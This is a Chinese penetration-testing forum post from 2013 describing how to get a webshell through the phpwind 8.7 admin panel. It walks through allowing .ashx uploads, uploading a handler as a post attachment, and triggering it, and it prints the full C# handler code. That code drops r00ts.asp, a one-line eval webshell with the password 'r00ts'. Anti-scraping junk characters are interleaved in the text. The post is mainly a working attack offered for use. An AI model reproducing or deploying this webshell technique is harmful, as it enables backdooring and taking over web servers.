找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpwind 8.7 后台拿shell
返回列表 发新帖
查看: 2575|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
% N4 L3 X& ]( w4 q8 S0 i( L# \; a 0 y+ X6 A  }# ^' w2 |$ f3 c% K
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx' P0 |7 f& E6 x' O+ c
6 s& y. ^: Q% a; u
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整2 z1 c8 i# k: w3 ?7 b5 p

$ h- x) k: ~" E) g3 k- Y; \然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
) [# K* j2 h% I- H0 S) J 1 P. C( m2 o* {- [" D' N
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts+ p4 @5 f0 c0 [0 }7 J7 j8 w
( Z6 w2 ~, t2 t8 l2 e' \# F
下面是代码:
5 m6 [. k! V2 ?) ]
6 Z9 F. R, j3 g( X6 m<%@ WebHandler Language="C#"Class="Handler" %>! P5 b' j/ ?; k' v3 y9 {
using System;
: B/ G! u/ M3 W  fusing System.Web;+ d- B( `$ \$ H4 D2 E2 b% C
using System.IO;
) h/ ^) C- B" V* B; x2 Hpublic class Handler : IHttpHandler {
8 J# p# l. z! b8 o6 U- dpublic void ProcessRequest (HttpContext context) {$ w4 i( g; ^# C) z+ R
context.Response.ContentType = "text/plain";
$ T5 Q, Q# J* Q/ T* D* I4 p; mStreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
: e5 P4 g. y, v5 }; \file1.Write("<%eval request(\"r00ts\")%>");% L. O: U' f. c, b" Y0 @
file1.Flush();
6 o; \: Y7 h/ ]5 c( O  |file1.Close();
; z/ a2 J5 }1 d0 [' y}  |- S! f4 r- ^- D1 K
public bool IsReusable {- v' c. _' K9 B$ c- U0 H( P
get {
* U4 H) h! V' y' Ureturn false;% K% z* t+ q7 ]  E4 D
}
+ ]2 K# [/ T& L}
' ~* \# y8 |4 e}- J- e/ a; \" A. X" }9 Q6 ?
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表